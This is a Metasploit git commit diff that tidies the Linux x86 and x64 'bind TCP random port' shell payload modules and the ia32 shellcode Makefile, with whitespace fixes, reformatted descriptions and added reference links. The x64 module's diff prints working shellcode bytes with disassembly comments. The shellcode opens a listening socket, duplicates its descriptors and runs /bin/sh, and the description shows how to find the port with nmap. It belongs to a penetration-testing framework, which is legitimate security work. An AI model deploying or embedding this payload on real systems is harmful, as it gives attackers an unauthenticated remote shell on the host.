Fixes for #2350, random bind shellcode

* Moved shortlink to a reference. * Reformat e-mail address. * Fixed whitespace * Use multiline quote per most other module descriptions Still need to resplat the modules, but it's no big thang to do that after landing. Also, References do not seem to appear for post modules in the normal msfconsole. This is a bug in the UI, not for these modules -- many payloads would benefit from being explicit on their references, so may as well start with these.
2013-11-11 10:33:15 -06:00 · 2013-11-11 10:33:15 -06:00 · 81a7b1a9bf
parent 31f265b411
commit 81a7b1a9bf
3 changed files with 26 additions and 22 deletions
--- a/external/source/shellcode/linux/ia32/Makefile
+++ b/external/source/shellcode/linux/ia32/Makefile
@ -1,11 +1,11 @@
 STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
-        stager_egghunt stager_sock_find stager_sock_reverse \
-        stager_sock_reverse_icmp stager_sock_reverse_udp \
+				stager_egghunt stager_sock_find stager_sock_reverse \
+				stager_sock_reverse_icmp stager_sock_reverse_udp \
 				stager_sock_reverse_udp_dns
 STAGES=stage_tcp_shell stage_udp_shell
 SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
-       single_reverse_tcp_shell single_reverse_udp_shell single_exec \
-       single_shell_bind_tcp_random_port
+			 single_reverse_tcp_shell single_reverse_udp_shell single_exec \
+			 single_shell_bind_tcp_random_port

 OBJS=${STAGERS} ${STAGES} ${SINGLE}

@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
 	@ruby -p -a -e ' \
 		$$F.shift; \
 		$$F[0].tap { |s| \
-			s.tr! "A-F", "a-f"; \
-			t=s.dup; \
-			s.clear; \
-			s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
-			STDIN.eof? ? s<< " #  " : s<< "+#  "; \
+		s.tr! "A-F", "a-f"; \
+		t=s.dup; \
+		s.clear; \
+		s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
+		STDIN.eof? ? s<< " #  " : s<< "+#  "; \
 		}; \
 		$$_ = $$F.join(" ") + "\n"; \
 		' < $*.tmp > $@
--- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
@ -15,11 +15,13 @@ module Metasploit3
  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Bind TCP Random Port Inline',
-      'Description'   => 'Listen for a connection in a random port and spawn a command shell. ' \
-                         'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
-                         'Assembly source: http://goo.gl/TAveVc',
-      'Author'        => 'Geyslan G. Bem <geyslan@gmail.com>',
+      'Description'   => %q{
+        Listen for a connection in a random port and spawn a command shell.
+        Use nmap to discover the open port: 'nmap -sS target -p-'.
+      },
+      'Author'        => 'Geyslan G. Bem <geyslan[at]gmail.com>',
      'License'       => BSD_LICENSE,
+      'References'    => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86_64,
      'Payload'       =>
@ -31,21 +33,21 @@ module Metasploit3
            "\x6a\x02"              +#  pushq  $0x2
            "\x5f"                  +#  pop    %rdi
            "\xb0\x29"              +#  mov    $0x29,%al
-            "\x0f\x05"              +#  syscall 
+            "\x0f\x05"              +#  syscall
            "\x52"                  +#  push   %rdx
            "\x5e"                  +#  pop    %rsi
            "\x50"                  +#  push   %rax
            "\x5f"                  +#  pop    %rdi
            "\xb0\x32"              +#  mov    $0x32,%al
-            "\x0f\x05"              +#  syscall 
+            "\x0f\x05"              +#  syscall
            "\xb0\x2b"              +#  mov    $0x2b,%al
-            "\x0f\x05"              +#  syscall 
+            "\x0f\x05"              +#  syscall
            "\x57"                  +#  push   %rdi
            "\x5e"                  +#  pop    %rsi
            "\x48\x97"              +#  xchg   %rax,%rdi
            "\xff\xce"              +#  dec    %esi
            "\xb0\x21"              +#  mov    $0x21,%al
-            "\x0f\x05"              +#  syscall 
+            "\x0f\x05"              +#  syscall
            "\x75\xf8"              +#  jne    40009f
            "\x52"                  +#  push   %rdx
            "\x48\xbf\x2f\x2f\x62"  +#  movabs $0x68732f6e69622f2f,%rdi
@ -54,7 +56,7 @@ module Metasploit3
            "\x54"                  +#  push   %rsp
            "\x5f"                  +#  pop    %rdi
            "\xb0\x3b"              +#  mov    $0x3b,%al
-            "\x0f\x05"               #  syscall 
+            "\x0f\x05"               #  syscall
        }
      ))
  end
--- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
@ -15,11 +15,13 @@ module Metasploit3
  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Bind TCP Random Port Inline',
-      'Description'   => 'Listen for a connection in a random port and spawn a command shell. ' \
-                         'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
-                         'Assembly source: http://goo.gl/V5OObo',
-      'Author'        => 'Geyslan G. Bem <geyslan@gmail.com>',
+      'Description'   => %q{
+        Listen for a connection in a random port and spawn a command shell.
+        Use nmap to discover the open port: 'nmap -sS target -p-'.
+      },
+      'Author'        => 'Geyslan G. Bem <geyslan[at]gmail.com>',
      'License'       => BSD_LICENSE,
+      'References'    => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'],
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86,
      'Payload'       =>